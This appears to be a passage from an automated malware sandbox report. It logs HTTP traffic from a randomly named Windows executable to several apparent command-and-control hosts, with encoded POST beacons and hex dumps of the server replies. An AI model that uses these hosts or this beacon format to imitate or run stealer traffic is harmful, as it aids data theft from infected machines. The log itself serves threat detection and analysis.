                                                                Expires: Sun, 22 Sep 2024 16:43:41 GMT
                                                                Location: https://www.rtpngk.xyz/876i/
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZSRwewCaF1Y0n9uCxa7WXjLmBxSZ%2BUJm4xKHM4JHOGDgMDcePIUo9WFl8yYfixcIsST3L4Nk0TKXxiGJXGNLOw3LJ1q2vDPEV1aSLSY%2B9MO5xAbxJUEo0V3Lwwj858WaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Vary: Accept-Encoding
                                                                Server: cloudflare
                                                                CF-RAY: 8c73697f0dde423e-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.649769188.114.96.3804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:44.095858097 CEST418OUTGET /876i/?i4fTbV=Kmyw+GmuH5iWde8Ln9Oic9mBBukDH7X+neEL39Fbw9B5TSRbsYx5ep9OaSlRgrfJ9t7osQY2p6mHYTWDA9JvWsELiS8f9ArZa8bqi05RWv7nbhrshbpVBxpFhG8DfoS8KPtDMCA=&azq=fdKL HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.rtpngk.xyz
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:44.513479948 CEST985INHTTP/1.1 301 Moved Permanently
                                                                Date: Sun, 22 Sep 2024 15:43:44 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 167
                                                                Connection: close
                                                                Cache-Control: max-age=3600
                                                                Expires: Sun, 22 Sep 2024 16:43:44 GMT
                                                                Location: https://www.rtpngk.xyz/876i/?i4fTbV=Kmyw+GmuH5iWde8Ln9Oic9mBBukDH7X+neEL39Fbw9B5TSRbsYx5ep9OaSlRgrfJ9t7osQY2p6mHYTWDA9JvWsELiS8f9ArZa8bqi05RWv7nbhrshbpVBxpFhG8DfoS8KPtDMCA=&azq=fdKL
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pADVP2hzkKnGhaUzkWUBw2QYdjfD3ylmuttL%2BbTtsTBTozUGOJn8fzqMOwZhuIULiGYdFdDXqDlDYGnnhv4E0UOeUanW%2Fq0KyDJFaa34yri8wNBRr%2FhQ61fsSPkwyhmQ7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                Server: cloudflare
                                                                CF-RAY: 8c73698ede9b8c27-EWR
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.649770154.23.184.240804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:49.794701099 CEST674OUTPOST /i557/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.wcq24.top
                                                                Origin: http://www.wcq24.top
                                                                Referer: http://www.wcq24.top/i557/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6d 37 5a 7a 41 6a 69 67 62 64 64 47 57 50 71 30 56 67 4d 70 35 73 32 56 4f 39 73 51 58 6c 35 4a 46 66 4d 4e 34 57 68 6c 4b 4d 33 38 31 4a 6a 55 31 65 6f 41 62 4e 30 45 71 6a 6f 62 54 4f 47 57 48 49 35 42 44 57 53 61 38 78 62 75 51 48 6f 4a 70 72 34 35 77 6a 71 66 79 65 47 38 4d 6f 4b 55 53 41 58 62 41 4e 53 48 6d 34 61 65 6d 6e 46 4d 34 43 71 50 53 34 68 51 56 51 44 67 76 64 4a 54 6a 47 59 70 34 5a 71 44 6a 69 6a 42 53 78 4b 38 2f 51 70 4c 44 4b 77 58 48 33 4c 4e 74 4f 35 32 34 31 48 6d 58 46 50 43 67 75 6f 55 4a 55 6d 4e 31 7a 73 34 52 4a 4e 49 77 53 41 69 50 32 68 6d 66 4b 61 4b 78 31 70 41 36 54 51 42
                                                                Data Ascii: i4fTbV=m7ZzAjigbddGWPq0VgMp5s2VO9sQXl5JFfMN4WhlKM381JjU1eoAbN0EqjobTOGWHI5BDWSa8xbuQHoJpr45wjqfyeG8MoKUSAXbANSHm4aemnFM4CqPS4hQVQDgvdJTjGYp4ZqDjijBSxK8/QpLDKwXH3LNtO5241HmXFPCguoUJUmN1zs4RJNIwSAiP2hmfKaKx1pA6TQB
                                                                Sep 22, 2024 17:43:50.671076059 CEST312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:50 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7679f-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.649771154.23.184.240804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:52.333945036 CEST698OUTPOST /i557/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.wcq24.top
                                                                Origin: http://www.wcq24.top
                                                                Referer: http://www.wcq24.top/i557/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6d 37 5a 7a 41 6a 69 67 62 64 64 47 45 65 36 30 57 43 6b 70 6f 4d 32 57 43 64 73 51 4e 56 35 56 46 66 51 4e 34 58 30 67 4b 2f 54 38 30 6f 54 55 30 61 38 41 59 4e 30 45 69 44 6f 61 4e 2b 47 6e 48 49 38 68 44 54 79 61 38 78 50 75 51 47 59 4a 70 34 51 36 77 7a 71 5a 39 2b 47 2b 49 6f 4b 55 53 41 58 62 41 4e 75 74 6d 34 53 65 6d 58 31 4d 2f 51 43 4d 61 59 68 54 44 41 44 67 6c 39 4a 58 6a 47 59 66 34 59 32 74 6a 67 72 42 53 7a 69 38 2b 45 46 49 57 61 78 65 61 6e 4b 45 6c 4c 59 2f 2b 54 43 30 5a 45 37 37 31 63 70 2b 42 43 6e 58 70 41 73 62 44 5a 74 4b 77 51 59 51 50 57 68 4d 64 4b 69 4b 6a 69 6c 6e 31 6e 31 69 64 32 43 79 58 6f 70 62 67 6e 33 7a 31 6e 51 37 36 2f 51 64 63 41 3d 3d
                                                                Data Ascii: i4fTbV=m7ZzAjigbddGEe60WCkpoM2WCdsQNV5VFfQN4X0gK/T80oTU0a8AYN0EiDoaN+GnHI8hDTya8xPuQGYJp4Q6wzqZ9+G+IoKUSAXbANutm4SemX1M/QCMaYhTDADgl9JXjGYf4Y2tjgrBSzi8+EFIWaxeanKElLY/+TC0ZE771cp+BCnXpAsbDZtKwQYQPWhMdKiKjiln1n1id2CyXopbgn3z1nQ76/QdcA==
                                                                Sep 22, 2024 17:43:53.212805986 CEST312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:53 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7679f-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.649772154.23.184.240804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:54.886008024 CEST1711OUTPOST /i557/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.wcq24.top
                                                                Origin: http://www.wcq24.top
                                                                Referer: http://www.wcq24.top/i557/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6d 37 5a 7a 41 6a 69 67 62 64 64 47 45 65 36 30 57 43 6b 70 6f 4d 32 57 43 64 73 51 4e 56 35 56 46 66 51 4e 34 58 30 67 4b 2f 62 38 30 61 72 55 31 39 41 41 5a 4e 30 45 73 6a 6f 66 4e 2b 47 36 48 49 45 74 44 54 2f 6c 38 79 33 75 51 67 6b 4a 2b 5a 51 36 37 7a 71 5a 32 65 47 2f 4d 6f 4b 37 53 41 6d 51 41 4e 65 74 6d 34 53 65 6d 52 5a 4d 70 53 71 4d 63 59 68 51 56 51 44 6b 76 64 49 43 6a 47 41 68 34 5a 43 54 67 51 4c 42 53 54 79 38 34 78 70 49 4c 71 78 63 5a 6e 4b 63 6c 4c 63 38 2b 54 32 77 5a 45 50 52 31 63 74 2b 52 55 33 4c 74 42 64 4d 51 2f 6c 41 76 41 6c 72 57 67 70 63 61 63 79 70 74 41 70 36 38 45 68 61 52 51 65 70 65 49 6b 2b 69 46 44 4a 39 77 56 6f 79 4e 56 45 44 7a 55 4d 78 6b 66 56 72 53 68 30 46 4c 36 42 49 4a 6b 2b 4a 7a 50 37 4d 36 55 67 42 6a 6b 56 35 4f 4f 76 53 6a 4b 78 63 56 48 5a 58 32 52 4e 2f 46 49 6f 67 77 43 57 4e 31 6d 79 64 66 6b 44 45 47 6b 48 76 57 65 55 38 4e 59 6e 79 4b 38 35 46 47 4a 49 69 6c 78 67 42 6e 33 31 57 74 31 51 53 77 2f 4a 30 70 7a 55 31 6a 52 [TRUNCATED]
                                                                Data Ascii: i4fTbV=m7ZzAjigbddGEe60WCkpoM2WCdsQNV5VFfQN4X0gK/b80arU19AAZN0EsjofN+G6HIEtDT/l8y3uQgkJ+ZQ67zqZ2eG/MoK7SAmQANetm4SemRZMpSqMcYhQVQDkvdICjGAh4ZCTgQLBSTy84xpILqxcZnKclLc8+T2wZEPR1ct+RU3LtBdMQ/lAvAlrWgpcacyptAp68EhaRQepeIk+iFDJ9wVoyNVEDzUMxkfVrSh0FL6BIJk+JzP7M6UgBjkV5OOvSjKxcVHZX2RN/FIogwCWN1mydfkDEGkHvWeU8NYnyK85FGJIilxgBn31Wt1QSw/J0pzU1jRZyOiYF1/pmWJ1nOUTV+hPaYfc1F2E7voPWhOUwwtrFUtA/19MHCP8zTnedPtbOu2gRm3oVlBvFHWjoasuPECyWVZ/BNIGp9VJnj7ySk/C0ZOdzXRqjxiYIsm7tTk8nU3HCdBGpn4hiclOa7fB2XdmoaDjO0sWVnJ4XzxwtxzfhP21xVYqWV+2m2dnB7DZycCTupd/h50RU3pxW+QRoPfGIWBdb1j2UGNQWgBLr6XVAihewnZ/sgGU10/ceuQOiov/u6v5WrExXbwq3PXwXEQsGbndYXWotsMiklDfqfLC+a5+6D2KVnG6LG62gkQ8xZuW5QDrzFSi9UTeEnOc1lybACmO16uZhnWQyWn8SsIHtosiX+GQ9oPFcClrD+0leG4rPQgIfsTFekmnnd4pC583UmQKsYrWXBcZFbN/knlDscloIeMpm++eZIxR1vzXB3dMQlKm2XPKvw7sVo/gglF+0lTWEUxw6yaBuBFNrZ0UzJ4YOBrVD/kmqWX1U/aJVBqP1rHieA+2+pHqYA3k3sURRwTO0V0tXUJTp+oBULdMPObZ59Iumz8qI/hB5dxQN0yNyTYzCoxbUkL/KyJKZhL3VPtSNPX+gY2XAms3DubT8Fr1ABfA4uOGK6sfR7F0hY5j1gY0olfq9dEv7DIvrV1JjsFM1NY1wD5hf [TRUNCATED]
                                                                Sep 22, 2024 17:43:55.768338919 CEST312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:55 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7679f-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.649773154.23.184.240804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:43:57.424365997 CEST417OUTGET /i557/?azq=fdKL&i4fTbV=r5xTDTq+P/dmGc23aTYP++6vD4IIXl1qT9Awk095V47k3JGT99IqetoKvxAOeL2EPogdFWvWqA7DbFw7qeor8ymW97eZJYTdZjDdM43a/Prut01z/AyWNItbEAzthb57mHY0hv0= HTTP/1.1
                                                                Accept: */*
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Host: www.wcq24.top
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Sep 22, 2024 17:43:58.384762049 CEST312INHTTP/1.1 404 Not Found
                                                                Server: nginx
                                                                Date: Sun, 22 Sep 2024 15:43:58 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 148
                                                                Connection: close
                                                                ETag: "66a7679f-94"
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.649774188.114.97.3804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:03.450546026 CEST674OUTPOST /4hfb/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 211
                                                                Cache-Control: no-cache
                                                                Host: www.cc101.pro
                                                                Origin: http://www.cc101.pro
                                                                Referer: http://www.cc101.pro/4hfb/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6b 32 33 43 4d 77 4c 63 70 6b 73 33 7a 6f 78 76 62 43 30 6b 51 48 65 34 43 68 31 50 66 36 54 69 78 2f 61 45 4f 57 32 73 4d 2b 49 47 70 4c 43 64 50 37 72 42 63 46 7a 38 6d 66 44 6b 32 70 6c 61 52 4c 4c 4e 30 7a 79 70 37 62 2f 58 61 6f 6b 56 38 54 38 56 74 39 49 54 73 4c 69 2b 64 7a 64 34 51 74 6e 30 79 5a 35 4e 75 55 58 71 50 38 49 41 44 4f 31 51 41 77 4a 4e 30 41 6b 51 51 72 4f 75 6b 49 57 38 4a 53 67 41 54 2b 49 41 6a 76 77 6f 41 36 6d 37 49 55 64 4b 57 72 54 62 55 56 6f 67 4e 6a 61 47 63 31 4c 36 76 6f 50 78 72 68 6f 35 5a 69 4a 69 53 31 41 63 4f 79 57 53 6c 30 31 5a 56 50 70 37 54 33 69 4d 43 79 66 67
                                                                Data Ascii: i4fTbV=k23CMwLcpks3zoxvbC0kQHe4Ch1Pf6Tix/aEOW2sM+IGpLCdP7rBcFz8mfDk2plaRLLN0zyp7b/XaokV8T8Vt9ITsLi+dzd4Qtn0yZ5NuUXqP8IADO1QAwJN0AkQQrOukIW8JSgAT+IAjvwoA6m7IUdKWrTbUVogNjaGc1L6voPxrho5ZiJiS1AcOyWSl01ZVPp7T3iMCyfg


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.649775188.114.97.3804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:05.990099907 CEST698OUTPOST /4hfb/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 235
                                                                Cache-Control: no-cache
                                                                Host: www.cc101.pro
                                                                Origin: http://www.cc101.pro
                                                                Referer: http://www.cc101.pro/4hfb/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6b 32 33 43 4d 77 4c 63 70 6b 73 33 79 49 74 76 64 6c 59 6b 59 48 65 37 65 52 31 50 56 61 54 6d 78 2f 57 45 4f 58 7a 33 4d 4e 38 47 6f 71 79 64 4d 2f 2f 42 62 46 7a 38 2f 76 44 68 70 35 6c 42 52 4c 50 46 30 78 32 70 37 62 72 58 61 71 38 56 2f 6b 51 57 72 74 49 56 31 62 69 77 43 6a 64 34 51 74 6e 30 79 59 4a 33 75 53 2f 71 50 4d 59 41 41 72 42 54 42 77 4a 53 33 41 6b 51 62 4c 4f 79 6b 49 57 53 4a 54 38 36 54 38 77 41 6a 75 41 6f 42 72 6d 34 43 55 64 49 4c 62 53 6f 48 51 46 6b 50 53 58 45 65 48 44 37 2b 4c 44 71 71 58 70 6a 46 52 4a 42 41 6c 67 65 4f 77 4f 67 6c 55 31 7a 58 50 52 37 42 67 75 72 4e 47 36 44 46 35 65 6b 78 77 6b 68 5a 4f 70 36 68 6f 2b 6d 63 41 39 30 76 77 3d 3d
                                                                Data Ascii: i4fTbV=k23CMwLcpks3yItvdlYkYHe7eR1PVaTmx/WEOXz3MN8GoqydM//BbFz8/vDhp5lBRLPF0x2p7brXaq8V/kQWrtIV1biwCjd4Qtn0yYJ3uS/qPMYAArBTBwJS3AkQbLOykIWSJT86T8wAjuAoBrm4CUdILbSoHQFkPSXEeHD7+LDqqXpjFRJBAlgeOwOglU1zXPR7BgurNG6DF5ekxwkhZOp6ho+mcA90vw==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.649776188.114.97.3804508C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:44:08.535540104 CEST1711OUTPOST /4hfb/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.cc101.pro
                                                                Origin: http://www.cc101.pro
                                                                Referer: http://www.cc101.pro/4hfb/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 6b 32 33 43 4d 77 4c 63 70 6b 73 33 79 49 74 76 64 6c 59 6b 59 48 65 37 65 52 31 50 56 61 54 6d 78 2f 57 45 4f 58 7a 33 4d 4d 45 47 6f 59 57 64 50 64 58 42 61 46 7a 38 67 66 44 67 70 35 6b 5a 52 4e 6e 42 30 78 36 66 37 5a 54 58 59 4a 30 56 36 51 45 57 6c 74 49 56 36 37 69 39 64 7a 64 74 51 74 58 34 79 59 35 33 75 53 2f 71 50 4f 77 41 55 4f 31 54 44 77 4a 4e 30 41 6b 55 51 72 4f 57 6b 49 4f 6b 4a 54 34 51 54 6f 45 41 69 4f 51 6f 48 5a 4f 34 66 45 64 4f 62 4c 53 77 48 51 42 72 50 53 4c 2b 65 47 33 56 2b 4a 66 71 6e 68 63 6b 43 6b 6f 48 56 46 77 4e 5a 67 43 67 73 69 70 55 4a 76 67 4b 46 67 6e 44 44 32 43 4b 4f 5a 71 34 37 79 31 4d 51 76 70 6a 75 4e 62 69 52 53 31 77 79 58 76 4e 6f 31 30 53 32 65 77 54 64 4d 64 72 64 5a 38 56 42 6e 32 38 2f 59 4f 64 30 77 78 56 36 4a 71 5a 55 48 37 45 53 4c 58 6e 51 4b 64 4d 6c 74 47 5a 43 50 6a 63 35 62 59 68 33 61 50 35 6d 4e 31 77 2f 2f 54 6f 4b 77 50 2b 73 59 42 55 58 70 43 32 73 5a 65 59 61 6f 2f 70 72 38 49 4e 36 34 48 6c 50 6f 62 74 31 6f 78 [TRUNCATED]
                                                                Data Ascii: i4fTbV=k23CMwLcpks3yItvdlYkYHe7eR1PVaTmx/WEOXz3MMEGoYWdPdXBaFz8gfDgp5kZRNnB0x6f7ZTXYJ0V6QEWltIV67i9dzdtQtX4yY53uS/qPOwAUO1TDwJN0AkUQrOWkIOkJT4QToEAiOQoHZO4fEdObLSwHQBrPSL+eG3V+JfqnhckCkoHVFwNZgCgsipUJvgKFgnDD2CKOZq47y1MQvpjuNbiRS1wyXvNo10S2ewTdMdrdZ8VBn28/YOd0wxV6JqZUH7ESLXnQKdMltGZCPjc5bYh3aP5mN1w//ToKwP+sYBUXpC2sZeYao/pr8IN64HlPobt1oxzP3wCcTUd9CFbNt2ToZZybBCRyib6RQ8SXkLhAfjhkb0JjmZUTfU1QUz4aQ2GWXlzOdF3xvu+4YkPGnUQJLvPqbMjvREVBfn92c44lgfW6XF0ZfPo70/akJEWoifvEIO6eszhHcAcSSfDQUBC9yv0Ww3cBL31rEb0qllGhzbqx8Bx1nAUhBgkf2STaQ3a7O9wOtq84lYPSqUwmJEgMEigrqRIbVJDtmEWCN0IMNAZ7j2O7RqdbxhGzskyrLnV3LiJKLriDf6yljChz951gQTcyYgzA9BfzMxjcPKBE4iVkit/HT6FEElxiTkkp9CMbqrdykbLNIw1XsGJhCMrhlqH86dOWv969C2qmTuPVkB6dZlnrUCgsYfzN3pdwnLo76Xsb+6eoJ38lm3IFUb0TcqtRIUvZHrEPEvKoytIdQw79sKyemnbzaTxEtrSmq6qPeot2LJ6+RTMru5k64IxD6uSSqzXf4cUg7iEXwsMl5+l2/qFu6xXbfGM1jyRb80CxqldtFwSHa/B1zBv5TbG0qavD5fX/180Ssd4nXHe70BMYq5vgk6MAG5wayIthjWRT1aTtqTnRQGf97+VEHe/1QkIhSuvaAF1sxvqoN11bUyde7/f66UR9KUXGh7jxyujpXcYshoZl4BJEhV5LS/kabiOBklt6R3mFmsnG [TRUNCATED]
                                                                Sep 22, 2024 17:44:09.519821882 CEST690INHTTP/1.1 405 Not Allowed
                                                                Date: Sun, 22 Sep 2024 15:44:09 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                CF-Cache-Status: DYNAMIC
